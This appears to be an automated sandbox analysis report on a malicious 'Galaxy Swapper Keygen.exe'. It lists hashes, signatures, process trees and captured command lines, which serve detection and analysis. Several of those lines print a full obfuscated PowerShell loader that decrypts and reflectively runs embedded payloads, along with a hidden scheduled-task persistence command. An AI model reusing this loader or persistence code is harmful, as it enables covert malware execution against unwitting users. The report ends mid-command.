bbfdd9db8785dd9c5940c22e9a94b52e43a221814132aa201c8dfde197a9471f

Analysis

max time kernel
6s
max time network
152s
platform
windows11-21h2_x64
resource
win11-20240709-en
resource tags

arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
submitted
10-07-2024 04:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Galaxy Swapper Keygen.exe
Size

2.0MB
MD5

b920b1b707d9887034e5f0b04c50ebe5
SHA1

a08de84deeca9b3ad88ae7e54f7bd934416bf0ba
SHA256

33e07e5231fcfe47bb9ff19cb178f2df60c255c7e9ac45f7f661e29509af4080
SHA512

9e5a438e57996b6638ca6ef0b4c1bbe61a50e186ec6e05c3f1d316ba1accf170f9019514e31fe24d4ceeae67debfe9ae22aa16d2c7b2b6cbb711a527921cea30
SSDEEP

49152:yCZvr4pItkzQqc5jlGYC+vdSKmlcs0YrWt0Mh/Qo16:BR1hqINC+vdsWtBD

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
10156	powershell.exe
1736	powershell.exe
10916	powershell.exe
11916	powershell.exe
8264	powershell.exe
7228	powershell.exe
7380	powershell.exe
10564	powershell.exe
7040	powershell.exe
9856	powershell.exe
6524	powershell.exe
10808	powershell.exe
7968	powershell.exe
8560	powershell.exe
6708	powershell.exe
8416	powershell.exe
9828	powershell.exe
1912	powershell.exe
7036	powershell.exe
9188	powershell.exe
10204	powershell.exe
1072	powershell.exe
7440	powershell.exe
3788	powershell.exe
12692	powershell.exe
5184	powershell.exe
6148	powershell.exe
5320	powershell.exe
7508	powershell.exe
5692	powershell.exe
12072	powershell.exe
7936	powershell.exe
12488	powershell.exe
11032	powershell.exe
6876	powershell.exe
5484	powershell.exe
5908	powershell.exe
11392	powershell.exe
7444	powershell.exe
7920	powershell.exe
1660	powershell.exe
6120	powershell.exe
8880	powershell.exe
9080	powershell.exe
10632	powershell.exe
8484	powershell.exe
4328	powershell.exe
5496	powershell.exe
1680	powershell.exe
10284	powershell.exe
11916	powershell.exe
2108	powershell.exe
8572	powershell.exe
10092	powershell.exe
11164	powershell.exe
10572	powershell.exe
6196	powershell.exe
8468	powershell.exe
7852	powershell.exe
8868	powershell.exe
6784	powershell.exe
4704	powershell.exe
10644	powershell.exe
11072	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Galaxy Swapper Keygen.exeGalaxy Swapper Keygen.exeGalaxy Swapper Keygen.exeGalaxy Swapper Keygen.exeGalaxy Swapper Keygen.exeGalaxy Swapper Keygen.exeGalaxy Swapper Keygen.exeGalaxy Swapper Keygen.exeGalaxy Swapper Keygen.exeGalaxy Swapper Keygen.exeGalaxy Swapper Keygen.exe

description	pid	process	target process
PID 1192 wrote to memory of 4240	1192	Galaxy Swapper Keygen.exe	cmd.exe
PID 1192 wrote to memory of 4240	1192	Galaxy Swapper Keygen.exe	cmd.exe
PID 1192 wrote to memory of 4240	1192	Galaxy Swapper Keygen.exe	cmd.exe
PID 1192 wrote to memory of 4068	1192	Galaxy Swapper Keygen.exe	Galaxy Swapper Keygen.exe
PID 1192 wrote to memory of 4068	1192	Galaxy Swapper Keygen.exe	Galaxy Swapper Keygen.exe
PID 1192 wrote to memory of 4068	1192	Galaxy Swapper Keygen.exe	Galaxy Swapper Keygen.exe
PID 4068 wrote to memory of 5000	4068	Galaxy Swapper Keygen.exe	cmd.exe
PID 4068 wrote to memory of 5000	4068	Galaxy Swapper Keygen.exe	cmd.exe
PID 4068 wrote to memory of 5000	4068	Galaxy Swapper Keygen.exe	cmd.exe
PID 4068 wrote to memory of 928	4068	Galaxy Swapper Keygen.exe	Galaxy Swapper Keygen.exe
PID 4068 wrote to memory of 928	4068	Galaxy Swapper Keygen.exe	Galaxy Swapper Keygen.exe
PID 4068 wrote to memory of 928	4068	Galaxy Swapper Keygen.exe	Galaxy Swapper Keygen.exe
PID 928 wrote to memory of 3164	928	Galaxy Swapper Keygen.exe	cmd.exe
PID 928 wrote to memory of 3164	928	Galaxy Swapper Keygen.exe	cmd.exe
PID 928 wrote to memory of 3164	928	Galaxy Swapper Keygen.exe	cmd.exe
PID 928 wrote to memory of 4052	928	Galaxy Swapper Keygen.exe	Galaxy Swapper Keygen.exe
PID 928 wrote to memory of 4052	928	Galaxy Swapper Keygen.exe	Galaxy Swapper Keygen.exe
PID 928 wrote to memory of 4052	928	Galaxy Swapper Keygen.exe	Galaxy Swapper Keygen.exe
PID 4052 wrote to memory of 2876	4052	Galaxy Swapper Keygen.exe	cmd.exe
PID 4052 wrote to memory of 2876	4052	Galaxy Swapper Keygen.exe	cmd.exe
PID 4052 wrote to memory of 2876	4052	Galaxy Swapper Keygen.exe	cmd.exe
PID 4052 wrote to memory of 3788	4052	Galaxy Swapper Keygen.exe	powershell.exe
PID 4052 wrote to memory of 3788	4052	Galaxy Swapper Keygen.exe	powershell.exe
PID 4052 wrote to memory of 3788	4052	Galaxy Swapper Keygen.exe	powershell.exe
PID 3788 wrote to memory of 4480	3788	Galaxy Swapper Keygen.exe	cmd.exe
PID 3788 wrote to memory of 4480	3788	Galaxy Swapper Keygen.exe	cmd.exe
PID 3788 wrote to memory of 4480	3788	Galaxy Swapper Keygen.exe	cmd.exe
PID 3788 wrote to memory of 1028	3788	Galaxy Swapper Keygen.exe	Galaxy Swapper Keygen.exe
PID 3788 wrote to memory of 1028	3788	Galaxy Swapper Keygen.exe	Galaxy Swapper Keygen.exe
PID 3788 wrote to memory of 1028	3788	Galaxy Swapper Keygen.exe	Galaxy Swapper Keygen.exe
PID 1028 wrote to memory of 4796	1028	Galaxy Swapper Keygen.exe	cmd.exe
PID 1028 wrote to memory of 4796	1028	Galaxy Swapper Keygen.exe	cmd.exe
PID 1028 wrote to memory of 4796	1028	Galaxy Swapper Keygen.exe	cmd.exe
PID 1028 wrote to memory of 3440	1028	Galaxy Swapper Keygen.exe	Galaxy Swapper Keygen.exe
PID 1028 wrote to memory of 3440	1028	Galaxy Swapper Keygen.exe	Galaxy Swapper Keygen.exe
PID 1028 wrote to memory of 3440	1028	Galaxy Swapper Keygen.exe	Galaxy Swapper Keygen.exe
PID 3440 wrote to memory of 3620	3440	Galaxy Swapper Keygen.exe	cmd.exe
PID 3440 wrote to memory of 3620	3440	Galaxy Swapper Keygen.exe	cmd.exe
PID 3440 wrote to memory of 3620	3440	Galaxy Swapper Keygen.exe	cmd.exe
PID 3440 wrote to memory of 2880	3440	Galaxy Swapper Keygen.exe	Galaxy Swapper Keygen.exe
PID 3440 wrote to memory of 2880	3440	Galaxy Swapper Keygen.exe	Galaxy Swapper Keygen.exe
PID 3440 wrote to memory of 2880	3440	Galaxy Swapper Keygen.exe	Galaxy Swapper Keygen.exe
PID 2880 wrote to memory of 1952	2880	Galaxy Swapper Keygen.exe	cmd.exe
PID 2880 wrote to memory of 1952	2880	Galaxy Swapper Keygen.exe	cmd.exe
PID 2880 wrote to memory of 1952	2880	Galaxy Swapper Keygen.exe	cmd.exe
PID 2880 wrote to memory of 4632	2880	Galaxy Swapper Keygen.exe	Galaxy Swapper Keygen.exe
PID 2880 wrote to memory of 4632	2880	Galaxy Swapper Keygen.exe	Galaxy Swapper Keygen.exe
PID 2880 wrote to memory of 4632	2880	Galaxy Swapper Keygen.exe	Galaxy Swapper Keygen.exe
PID 4632 wrote to memory of 4284	4632	Galaxy Swapper Keygen.exe	cmd.exe
PID 4632 wrote to memory of 4284	4632	Galaxy Swapper Keygen.exe	cmd.exe
PID 4632 wrote to memory of 4284	4632	Galaxy Swapper Keygen.exe	cmd.exe
PID 4632 wrote to memory of 1728	4632	Galaxy Swapper Keygen.exe	cmd.exe
PID 4632 wrote to memory of 1728	4632	Galaxy Swapper Keygen.exe	cmd.exe
PID 4632 wrote to memory of 1728	4632	Galaxy Swapper Keygen.exe	cmd.exe
PID 1728 wrote to memory of 3960	1728	Galaxy Swapper Keygen.exe	cmd.exe
PID 1728 wrote to memory of 3960	1728	Galaxy Swapper Keygen.exe	cmd.exe
PID 1728 wrote to memory of 3960	1728	Galaxy Swapper Keygen.exe	cmd.exe
PID 1728 wrote to memory of 3860	1728	Galaxy Swapper Keygen.exe	Conhost.exe
PID 1728 wrote to memory of 3860	1728	Galaxy Swapper Keygen.exe	Conhost.exe
PID 1728 wrote to memory of 3860	1728	Galaxy Swapper Keygen.exe	Conhost.exe
PID 3860 wrote to memory of 3108	3860	Galaxy Swapper Keygen.exe	cmd.exe
PID 3860 wrote to memory of 3108	3860	Galaxy Swapper Keygen.exe	cmd.exe
PID 3860 wrote to memory of 3108	3860	Galaxy Swapper Keygen.exe	cmd.exe
PID 3860 wrote to memory of 1640	3860	Galaxy Swapper Keygen.exe	Galaxy Swapper Keygen.exe

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
2⤵
PID:4240

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
3⤵
PID:3296

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
3⤵
- Command and Scripting Interpreter: PowerShell
PID:4328

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_601_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_601.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
PID:3788

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_601.vbs"
4⤵
PID:3036

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_601.bat" "
5⤵
PID:2332

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_601.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
6⤵
PID:10816

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Command and Scripting Interpreter: PowerShell
PID:10632

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:4068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
3⤵
PID:5000

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
4⤵
PID:5476

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
4⤵
- Command and Scripting Interpreter: PowerShell
PID:5496

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_683_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_683.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
5⤵
- Command and Scripting Interpreter: PowerShell
PID:8572

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_683.vbs"
5⤵
PID:9748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_683.bat" "
6⤵
PID:4020

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:928

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
4⤵
PID:3164

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:4052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
5⤵
PID:2876

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:3788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
6⤵
PID:4480

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
6⤵
- Suspicious use of WriteProcessMemory
PID:1028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
7⤵
PID:4796

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
7⤵
- Suspicious use of WriteProcessMemory
PID:3440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
8⤵
PID:3620

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
8⤵
- Suspicious use of WriteProcessMemory
PID:2880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
9⤵
PID:1952

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
9⤵
- Suspicious use of WriteProcessMemory
PID:4632

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
10⤵
PID:4284

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
10⤵
- Suspicious use of WriteProcessMemory
PID:1728

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
11⤵
PID:3960

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
11⤵
- Suspicious use of WriteProcessMemory
PID:3860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
12⤵
PID:3108

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
12⤵
PID:1640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
13⤵
PID:2524

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
13⤵
PID:2192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
14⤵
PID:1432

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
15⤵
PID:124

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
15⤵
- Command and Scripting Interpreter: PowerShell
PID:1912

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_279_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_279.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
16⤵
- Command and Scripting Interpreter: PowerShell
PID:10204

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_279.vbs"
16⤵
PID:10044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_279.bat" "
17⤵
PID:6204

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
14⤵
PID:5068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
15⤵
PID:4720

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
15⤵
PID:3112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
16⤵
PID:3876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 